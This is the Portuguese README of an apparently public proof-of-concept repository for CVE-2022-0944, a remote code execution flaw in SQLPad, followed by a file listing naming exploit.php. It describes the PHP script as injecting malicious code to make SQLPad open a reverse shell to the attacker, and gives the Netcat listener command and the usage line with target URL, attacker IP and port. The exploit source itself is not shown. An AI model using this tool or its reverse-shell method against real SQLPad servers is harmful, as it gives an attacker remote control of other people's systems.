CVE-2022-0944 Remote Code Execution Exploit# SQLPad-RCE-Exploit-CVE-2022-0944
CVE-2022-0944 Remote Code Execution Exploit
# Funcionamento:
Este código PHP é projetado para explorar uma vulnerabilidade de Execução Remota de Código (RCE) no software SQLPad, relacionada à falha CVE-2022-0944. Ele funciona injetando um código malicioso na aplicação SQLPad, forçando-a a executar um comando de sistema que abre uma shell reversa – uma conexão que dá ao atacante controle remoto do sistema vulnerável.
# Pré-requisitos:
PHP CLI - (sudo apt-get install php-cli)
cURL (biblioteca PHP cURL) - (sudo apt-get install php-curl)
# Modo de uso:
configuração do Listener no Atacante
Para capturar a conexão reversa, inicie o Netcat na máquina do atacante. (nc -lvnp 4444)
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: A URL raiz do SQLPad vulnerável (ex.: http://target.com:3000).
<attacker_ip>: O endereço IP do atacante que escuta a conexão reversa (mesmo IP do Netcat).
<attacker_port>: A porta na qual o atacante está escutando (mesma porta usada no Netcat).
# Referencias:
https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944.git
https://nvd.nist.gov/vuln/detail/CVE-2022-0944
[4.0K] /data/pocs/787ba7dc3f003c880b93bf5f8a084053f881a5bd
├── [1.7K] exploit.php
└── [1.2K] README.md
0 directories, 2 files